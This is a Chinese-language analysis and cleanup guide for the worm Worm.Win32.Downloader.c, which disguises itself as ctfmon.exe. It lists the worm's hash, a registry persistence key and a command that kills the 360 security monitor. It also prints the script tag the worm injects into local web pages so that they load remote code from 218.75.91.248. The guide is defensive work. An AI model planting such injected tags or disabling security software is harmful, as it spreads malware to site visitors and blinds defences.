Worm.Win32.Downloader.c（ctfmon.exe）分析解决

Worm.Win32.Downloader.c分析

前面我们介绍过阿达的

ctfmon.exe[样本]

http://www.newjian.net/

jisuanjibingdu/2007/1017/1353.html

下面看看ctfmon.exe的分析：

文件名称：ctfmon.exe

文件大小：45,056 字节

AV命名：Win32.HLLW.Rubbish (Dr.Web v4.44);

Worm.Win32.Downloader.c (kav 7.0.0.125)

加壳方式：N/A

编写语言：Microsoft Visual C++ 6.0

病毒类型：蠕虫

文件MD5：6ede432a957fbbba10e2284819fe8d6e

传播方式：网页漏洞

样本来源：剑盟 [病毒样本] ctfmon不新不旧，刚刚好！

行为分析：

1.释放批处理：

%Systemroot%\\system32\\tmipo.bat (24 字节)

用记事本打开.可见 taskkill /im 360tray.exe

然后进程cmd启动conime.exe (好像是废话)。

2.修改注册表，添加开机启动项

注册表键： HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

注册表值： svchost

类型: REG_SZ

值： C:\\Documents and Settings\\Administrator\\桌面\\ctfmon.exe

注：值为ctfmon.exe的所在路径

3.激活批处理tmipo.bat终止360安全卫士实时监控程序

命令行 taskkill /im 360tray.exe

4.然.后svchost.exe启动wmiprvse.exe -Embedding

命令行：C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -Embedding

5.连接网络 218.75.91.248

6.遍历磁盘，查找*.htm、*.PHP、*.ASP等网页文件，插入一段JS代码：

<script language=javascript src=http://218.75.91.248/qq.js></script>

解决方法：

1、断开网络，使.用wsyscheck终止并删除伪ctfmon.exe

http://www.kingzoo.com/bbs/attachments/day_071018/20071018_253ef5f7d83854994eb71QyFzgbNwmw8.png

http://www.kingzoo.com/bbs/attachments/day_071018/20071018_1aae09c1294ec80c1d08DijHKgXo5coX.png

2、使.用wsyscheck删除ctfmon的开机启动项

http://www.kingzoo.com/bbs/attachments/day_071018/20071018_a018656e3c0da40eb557PKEBXCJPAKkM.png

3、使用iframekill清除被插入代码的网页

其他变种：Worm.Win32.Downloader.h

http://bbs.kaspersky.com.cn/viewthread.php?tid=20989

[脚本]Kill_伪ctfmon_伪explorer

http://hi.baidu.com/197321054/blog/item/bc34da078f221fc97b894798.html